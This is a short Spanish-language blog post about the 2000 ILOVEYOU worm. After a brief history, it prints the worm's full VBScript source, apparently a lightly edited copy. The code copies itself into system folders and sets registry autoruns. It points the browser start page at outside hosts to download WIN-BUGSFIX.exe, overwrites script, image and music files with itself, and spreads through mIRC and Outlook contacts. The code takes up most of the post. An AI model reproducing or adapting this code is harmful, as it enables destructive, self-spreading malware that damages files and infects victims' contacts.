18 Visitas

Biebvenidos, hoy les mostraré sobre el Famoso Virus “I Love You”

Que es I Los ve You?

I love You, es un malware de categoría virus, tal malware, fue lanzado en el año 2000, en el que infectó mas de 10.000 ordenadores con Windows 98, 2000, ME y XP, llegando a causar pérdidas de 2.500M$

Método que usaron
El virus se propagaba por E-Mail, por los servicios Outlook Express y Hotmail (actualmente Outlook)

Al ejecutarlo

Al ejecutar el malware, eliminaba los archivos con extensiones .JS, .JSE, .CSS, .WSH, .SCT y .HTA, y creaba otros con el mismo nombre y extensión .VBS en el que introducía su código, también localizaba los archivos con extensión .JPG, .JPEG, .MP3 y .MP2.

Virus
El virus en sí,  era una “carta de amor para ti”, con el nombre de I love you

LOVE_LETTER_FOR_YOU.txt. Cuando el virus se ejecutaba, automáticamente se enviaba a todos sus contactos

(Si la imagen no se muestra, espera 1m y recarga la página)

Código fuente
Malware escrito en VB, abajo dejo su código fuente

				
					rem  barok -loveletter(vbe) <i hate to love> 
rem by: Edited By Mani sai Prasad
 On Error Resume Next 
 dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,dow 
 eq="" 
 ctr=0 
 Set fso = CreateObject("Scripting.FileSystemObject") 
 set file = fso.OpenTextFile(WScript.ScriptFullname,1) 
 vbscopy=file.ReadAll 
 main() 
 sub main() 
 On Error Resume Next 
 dim wscr,rr 
 set wscr=CreateObject("WScript.Shell") 
 rr=wscr.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout") 
 if (rr>=1) then 
 wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout",0,"REG_DWORD" 
 end if 
 Set dirwin = fso.GetSpecialFolder(0) 
 Set dirsystem = fso.GetSpecialFolder(1) 
 Set dirtemp = fso.GetSpecialFolder(2) 
 Set c = fso.GetFile(WScript.ScriptFullName) 
 c.Copy(dirsystem&"\MSKernel32.vbs") 
 c.Copy(dirwin&"\Win32DLL.vbs") 
 c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs") 
 regruns() 
 html() 
 spreadtoemail() 
 listadriv() 
 end sub 
 sub regruns() 
 On Error Resume Next 
 Dim num,downread 
 regcreate 
 "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSKern el32",dirsystem&"\MSKernel32.vbs" 
 regcreate 
 "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunService s\Win32DLL",dirwin&"\Win32DLL.vbs" 
 downread="" 
 downread=regget("HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Download Directory") 
 if (downread="") then 
 downread="c:\" 
 end if 
 if (fileexist(dirsystem&"\WinFAT32.exe")=1) then 
 Randomize 
 num = Int((4 * Rnd) + 1) 
 if num = 1 then 
 regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start 
 Page","http://www.skyinet.net/~young1s/HJKhjnwerhjkxcvytwertnMTFwetrdsfm 
 hPnjw6587345gvsdf7679njbvYT/WIN-BUGSFIX.exe" 
 elseif num = 2 then 
 regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~angelcat/skladjflfdjghKJnwetryDGFikjUIyqw 
 erWe546786324hjk4jnHHGbvbmKLJKjhkqj4w/WIN-BUGSFIX.exe" 
 elseif num = 3 then 
 regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start 
 Page","http://www.skyinet.net/~koichi/jf6TRjkcbGRpGqaq198vbFV5hfFEkbopBd 
 QZnmPOhfgER67b3Vbvg/WIN-BUGSFIX.exe" 
 elseif num = 4 then 
 regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start 
 Page","http://www.skyinet.net/~chu/sdgfhjksdfjklNBmnfgkKLHjkqwtuHJBhAFSD 
 GjkhYUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237461234iuy7thjg/WIN -BUGSFIX.exe" 
 end if 
 end if 
 if (fileexist(downread&"\WIN-BUGSFIX.exe")=0) then regcreate 
 "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\WIN-BU GSFIX",downread&"\WIN-BUGSFIX.exe" 
 regcreate "HKEY_CURRENT_USER\Software\Microsoft\Internet 
 Explorer\Main\Start Page","about:blank" 
 end if 
 end sub 
 sub listadriv 
 On Error Resume Next 
 Dim d,dc,s 
 Set dc = fso.Drives 
 For Each d in dc 
 If d.DriveType = 2 or d.DriveType=3 Then 
 folderlist(d.path&"\") 
 end if 
 Next 
 listadriv = s 
 end sub 
 sub infectfiles(folderspec) 
 On Error Resume Next 
 dim f,f1,fc,ext,ap,mircfname,s,bname,mp3 
 set f = fso.GetFolder(folderspec) 
 set fc = f.Files 
 for each f1 in fc 
 ext=fso.GetExtensionName(f1.path) 
 ext=lcase(ext) 
 s=lcase(f1.name) 
 if (ext="vbs") or (ext="vbe") then 
 set ap=fso.OpenTextFile(f1.path,2,true) 
 ap.write vbscopy 
 ap.close 
 elseif(ext="js") or (ext="jse") or (ext="css") or (ext="wsh") or (ext="sct") or (ext="hta") then 
 set ap=fso.OpenTextFile(f1.path,2,true) 
 ap.write vbscopy 
 ap.close 
 bname=fso.GetBaseName(f1.path) 
 set cop=fso.GetFile(f1.path) 
 cop.copy(folderspec&"\"&bname&".vbs") fso.DeleteFile(f1.path) 
 elseif(ext="jpg") or (ext="jpeg") then 
 set ap=fso.OpenTextFile(f1.path,2,true) 
 ap.write vbscopy 
 ap.close 
 set cop=fso.GetFile(f1.path) 
 cop.copy(f1.path&".vbs") 
 fso.DeleteFile(f1.path) 
 elseif(ext="mp3") or (ext="mp2") then 
 set mp3=fso.CreateTextFile(f1.path&".vbs") 
 mp3.write vbscopy 
 mp3.close 
 set att=fso.GetFile(f1.path) 
 att.attributes=att.attributes+2 
 end if 
 if (eq<>folderspec) then 
 if (s="mirc32.exe") or (s="mlink32.exe") or (s="mirc.ini") or (s="script.ini") or (s="mirc.hlp") then 
 set scriptini=fso.CreateTextFile(folderspec&"\script.ini") scriptini.WriteLine "[script]" 
 scriptini.WriteLine ";mIRC Script" 
 scriptini.WriteLine ";  Please dont edit this script... mIRC will corrupt, if mIRC will" 
 scriptini.WriteLine "    corrupt... WINDOWS will affect and will not run correctly. thanks" 
 scriptini.WriteLine ";" 
 scriptini.WriteLine ";Khaled Mardam-Bey" 
 scriptini.WriteLine ";http://www.mirc.com" 
 scriptini.WriteLine ";" 
 scriptini.WriteLine "n0=on 1:JOIN:#:{" 
 scriptini.WriteLine "n1=  /if ( $nick == $me ) { halt }" scriptini.WriteLine "n2=  /.dcc send $nick 
 "&dirsystem&"\LOVE-LETTER-FOR-YOU.HTM" 
 scriptini.WriteLine "n3=}" 
 scriptini.close 
 eq=folderspec 
 end if 
 end if 
 next 
 end sub 
 sub folderlist(folderspec) 
 On Error Resume Next 
 dim f,f1,sf 
 set f = fso.GetFolder(folderspec) 
 set sf = f.SubFolders 
 for each f1 in sf 
 infectfiles(f1.path) 
 folderlist(f1.path) 
 next 
 end sub 
 sub regcreate(regkey,regvalue) 
 Set regedit = CreateObject("WScript.Shell") 
 regedit.RegWrite regkey,regvalue 
 end sub 
 function regget(value) 
 Set regedit = CreateObject("WScript.Shell") 
 regget=regedit.RegRead(value) 
 end function 
 function fileexist(filespec) 
 On Error Resume Next 
 dim msg 
 if (fso.FileExists(filespec)) Then 
 msg = 0 
 else 
 msg = 1 
 end if 
 fileexist = msg 
 end function 
 function folderexist(folderspec) 
 On Error Resume Next 
 dim msg 
 if (fso.GetFolderExists(folderspec)) then 
 msg = 0 
 else 
 msg = 1 
 end if 
 fileexist = msg 
 end function 
 sub spreadtoemail() 
 On Error Resume Next 
 dim x,a,ctrlists,ctrentries,malead,b,regedit,regv,regad 
 set regedit=CreateObject("WScript.Shell") 
 set out=WScript.CreateObject("Outlook.Application") 
 set mapi=out.GetNameSpace("MAPI") 
 for ctrlists=1 to mapi.AddressLists.Count 
 set a=mapi.AddressLists(ctrlists) 
 x=1 
 regv=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a) if (regv="") then 
 regv=1 
 end if 
 if (int(a.AddressEntries.Count)>int(regv)) then 
 for ctrentries=1 to a.AddressEntries.Count 
 malead=a.AddressEntries(x) 
 regad="" 
 regad=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead ) 
 if (regad="") then 
 set male=out.CreateItem(0) 
 male.Recipients.Add(malead) 
 male.Subject = "ILOVEYOU" 
 male.Body = vbcrlf&"kindly check the attached LOVELETTER coming from me." 
 male.Attachments.Add(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs") male.Send 
 regedit.RegWrite 
 "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead,1,"REG_DWORD" end if 
 x=x+1 
 next 
 regedit.RegWrite 
 "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count else 
 regedit.RegWrite 
 "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count end if 
 next 
 Set out=Nothing 
 Set mapi=Nothing 
 end sub 
 sub html 
 On Error Resume Next 
 dim lines,n,dta1,dta2,dt1,dt2,dt3,dt4,l1,dt5,dt6 
 dta1="<HTML><HEAD><TITLE>LOVELETTER - HTML<?-?TITLE><**** NAME=@-@Generator@-@ CONTENT=@-@BAROK VBS - 
 LOVELETTER@-@>"&vbcrlf& _ "<**** NAME=@-@Author@-@ CONTENT=@-@spyder ?-? ispyder@mail.com ?-? 
 @GRAMMERSoft Group ?-? Manila, Philippines ?-? March 2000@-@>"&vbcrlf& _ "<**** NAME=@-@Description@-@ 
 CONTENT=@-@simple but i think this is good...@-@>"&vbcrlf& _ 
 "<?-?HEAD><BODY 
 ONMOUSEOUT=@-@window.name=#-#main#-#;window.open(#-#LOVE-LETTER-FOR-YOU. 
 HTM#-#,#-#main#-#)@-@ "&vbcrlf& _ 
 "ONKEYDOWN=@-@window.name=#-#main#-#;window.open(#-#LOVE-LETTER-FOR-YOU. HTM#-#,#-#main#-#)@-@ 
 BGPROPERTIES=@-@fixed@-@ 
 BGCOLOR=@-@#FF9933@-@>"&vbcrlf& _ 
 "<CENTER><p>This HTML file need ActiveX Control<?-?p><p>To Enable to read this HTML file<BR>- Please press #-#YES#-# button to 
 Enable ActiveX<?-?p>"&vbcrlf& _ 
 "<?-?CENTER><MARQUEE LOOP=@-@infinite@-@ 
 BGCOLOR=@-@yellow@-@>----------z--------------------z----------<?-?MARQU EE> "&vbcrlf& _ 
 "<?-?BODY><?-?HTML>"&vbcrlf& _ 
 "<SCRIPT language=@-@JScript@-@>"&vbcrlf& _ "<!--?-??-?"&vbcrlf& _ 
 "if (window.screen){var wi=screen.availWidth;var 
 hi=screen.availHeight;window.moveTo(0,0);window.resizeTo(wi,hi);}"&vbcrl f& _ 
 "?-??-?-->"&vbcrlf& _ 
 "<?-?SCRIPT>"&vbcrlf& _ 
 "<SCRIPT LANGUAGE=@-@VBScript@-@>"&vbcrlf& _ "<!--"&vbcrlf& _ 
 "on error resume next"&vbcrlf& _ 
 "dim fso,dirsystem,wri,code,code2,code3,code4,aw,regdit"&vbcrlf& _ "aw=1"&vbcrlf& _ 
 "code=" 
 dta2="set fso=CreateObject(@-@Scripting.FileSystemObject@-@)"&vbcrlf& _ 
 "set dirsystem=fso.GetSpecialFolder(1)"&vbcrlf& _ "code2=replace(code,chr(91)&chr(45)&chr(91),chr(39))"&vbcrlf& _ 
 "code3=replace(code2,chr(93)&chr(45)&chr(93),chr(34))"&vbcrlf& _ "code4=replace(code3,chr(37)&chr(45)&chr(37),chr(92))"&vbcrlf& _ "set 
 wri=fso.CreateTextFile(dirsystem&@-@^-^MSKernel32.vbs@-@)"&vbcrlf& _ 
 "wri.write code4"&vbcrlf& _ 
 "wri.close"&vbcrlf& _ 
 "if (fso.FileExists(dirsystem&@-@^-^MSKernel32.vbs@-@)) then"&vbcrlf& _ "if (err.number=424) then"&vbcrlf& _ 
 "aw=0"&vbcrlf& _ 
 "end if"&vbcrlf& _ 
 "if (aw=1) then"&vbcrlf& _ 
 "********.write @-@ERROR: can#-#t initialize ActiveX@-@"&vbcrlf& _ "window.close"&vbcrlf& _ 
 "end if"&vbcrlf& _ 
 "end if"&vbcrlf& _ 
 "Set regedit = CreateObject(@-@WScript.Shell@-@)"&vbcrlf& _ 
 "regedit.RegWrite 
 @-@HKEY_LOCAL_MACHINE^-^Software^-^Microsoft^-^Windows^-^CurrentVersion^ 
 -^Run^-^MSKernel32@-@,dirsystem&@-@^-^MSKernel32.vbs@-@"&vbcrlf& _ "?-??-?-->"&vbcrlf& _ 
 "<?-?SCRIPT>" 
 dt1=replace(dta1,chr(35)&chr(45)&chr(35),"'") 
 dt1=replace(dt1,chr(64)&chr(45)&chr(64),"""") dt4=replace(dt1,chr(63)&chr(45)&chr(63),"/") 
 dt5=replace(dt4,chr(94)&chr(45)&chr(94),"\") 
 dt2=replace(dta2,chr(35)&chr(45)&chr(35),"'") 
 dt2=replace(dt2,chr(64)&chr(45)&chr(64),"""") dt3=replace(dt2,chr(63)&chr(45)&chr(63),"/") 
 dt6=replace(dt3,chr(94)&chr(45)&chr(94),"\") 
 set fso=CreateObject("Scripting.FileSystemObject") 
 set c=fso.OpenTextFile(WScript.ScriptFullName,1) 
 lines=Split(c.ReadAll,vbcrlf) 
 l1=ubound(lines) 
 for n=0 to ubound(lines) 
 lines(n)=replace(lines(n),"'",chr(91)+chr(45)+chr(91)) lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93)) 
 lines(n)=replace(lines(n),"\",chr(37)+chr(45)+chr(37)) if (l1=n) then 
 lines(n)=chr(34)+lines(n)+chr(34) 
 else 
 lines(n)=chr(34)+lines(n)+chr(34)&"&vbcrlf& _" end if 
 next 
 set b=fso.CreateTextFile(dirsystem+"\LOVE-LETTER-FOR-YOU.HTM") b.close 
 set d=fso.OpenTextFile(dirsystem+"\LOVE-LETTER-FOR-YOU.HTM",2) d.write dt5 
 d.write join(lines,vbcrlf) 
 d.write vbcrlf 
 d.write dt6 
 d.close 
 end sub
				
			

Otros virus parecidos: LoveLetter 

(Si el video no se muestra, espera 1m y recarga la página)

Yo soy VWolf y nos vemos en el próximo tutorial, comparte el blog si te gustó y para más ^^.